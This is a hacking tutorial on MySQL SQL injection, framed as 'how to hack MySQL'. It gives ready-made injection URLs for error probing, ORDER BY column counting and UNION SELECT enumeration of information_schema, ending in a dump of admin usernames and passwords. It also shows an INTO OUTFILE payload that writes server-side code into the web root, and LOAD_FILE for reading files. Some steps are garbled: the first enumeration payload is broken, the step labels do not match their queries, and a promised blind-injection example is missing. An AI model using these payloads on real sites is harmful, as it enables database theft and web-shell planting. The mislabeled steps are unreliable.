In this article, I will show you how to hack MySQL using SQL injection.
Technique SQL injection supported MySQL
- UINON query
- Read, write file
- Boolean-based Blind
- Time-based Blind
For example, consider follow url:
Suppose the query executed from the server is the following:
SELECT title, content from news where new_id=id
1. Check for vulnerability
We add to the end of URL some characters like ‘ (quote), ” (double quote)
If we get some error like this “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”4” LIMIT 0,1′ at line 1“. That means we have vulnerability SQL injection.
Technique 1: UNION query
Find the number of columns:
To find number of columns we use ORDER BY statement.
http://example.com/news.php?id=1 ORDER BY 1-- - <-- no error
http://example.com/news.php?id=1 ORDER BY 2-- - <-- no error
http://example.com/news.php?id=1 ORDER BY 3-- - <-- error
We get message like this “Unknown column ‘3’ in ‘order clause’”
That means this site has 2 columns, cause we got an error on 3.
Check for UNION query:
With union query, we can select more data in one SQL statement.
So we have
http://example.com/news.php?id=-1 union all select 1,2 -- -
— is a type of MySQL comment.
(we already found that number of columns are 2 in section “find number of columns”)
if we see some numbers on screen, i.e 1 or 2 then the UNION works.
– Check MySQL version.
Let say that we have two columns, now we check its version.
We replace the number 2 with @@version or version() and get something like 4.1.33-log or 5.0.45 or similar.
it should look like this
http://example.com/news.php?id=-1 union all select 1,@@version -- -
If you get an error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”
What we need is convert() function
http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
– Enumerate database, table and column name.
From MySQL 5.0, it has a database named INFORMATION_SCHEMA was created. It allows us to get all information about databases, tables, and columns, as well as procedures and functions.
Here is a summary of some interesting Views.
Tables_in_INFORMATION_SCHEMA DESCRIPTION ..[skipped].. ..[skipped].. SCHEMATA All databases the user has (at least) SELECT_priv SCHEMA_PRIVILEGES The privileges the user has for each DB TABLES All tables the user has (at least) SELECT_priv TABLE_PRIVILEGES The privileges the user has for each table COLUMNS All columns the user has (at least) SELECT_priv COLUMN_PRIVILEGES The privileges the user has for each column VIEWS All columns the user has (at least) SELECT_priv ROUTINES Procedures and functions (needs EXECUTE_priv) TRIGGERS Triggers (needs INSERT_priv) USER_PRIVILEGES Privileges connected User has
All of this information could be extracted by using known techniques as described in SQL Injection section.
1. Enumerate database
http://example.com/news.php?id=1 union all select 1,select -- - 2. enumerate tables
http://example.com/news.php?id=1 union select 1, schema_name from information_schema.schemata;-- -
3. Enumerate columns
http://example.com/news.php?id=1 union select 1, table_name from information_schema.tables where table_schema="owasp";-- -
4. Dump data table entries.
http://example.com/news.php?id=1 union select 1, column_name from information_schema.columns where table_schema="owasp" and table_name="admin";-- -
Now we get dislayed username:password on screen, i.e admin:admin or admin:hashtext
Technique 2: Boolean-based and Time-based Blind SQL injection
For blind SQL injection, there is a set of useful function natively provided by MySQL server.
- String Length:
- Extract a substring from a given string:
- SUBSTRING(string, offset, #chars_returned)
- Time based Blind Injection: BENCHMARK and SLEEP
- BENCHMARK(#ofcycles,action_to_be_performed )
- The benchmark function could be used to perform timing attacks, when blind injection by boolean values does not yield any results.
- See. SLEEP() (MySQL > 5.0.x) for an alternative on benchmark.
For Example Blind SQL injection:
Technique 3: Attack vectors (read, write file)
Write in a File
If the connected user has FILE privileges and single quotes are not escaped, the ‘into outfile’ clause can be used to export query results to a file.
Select * from table into outfile '/tmp/file'
Note: there is no way to bypass single quotes surrounding a filename. So if there’s some sanitization on single quotes like escape (\’) there will be no way to use the ‘into outfile’ clause.
This kind of attack could be used as an out-of-band technique to gain information about the results of a query or to write a file which could be executed inside the web server directory.
1 limit 1 into outfile '/var/www/root/test.jsp' FIELDS ENCLOSED BY '//' LINES TERMINATED BY '\n<%jsp code here%>';
Results are stored in a file with rw-rw-rw privileges owned by MySQL user and group.
Where /var/www/root/test.jsp will contain:
//field values// <%jsp code here%>
Read from a File
Load_file is a native function that can read a file when allowed by the file system permissions. If a connected user has FILE privileges, it could be used to get the file’s content. Single quotes escape sanitization can by bypassed by using previously described techniques.
The whole file will be available for exporting by using standard techniques.
MySQL injection cheat sheet: http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
Owasp testing guide v4: https://www.owasp.org/index.php/Testing_for_SQL_Server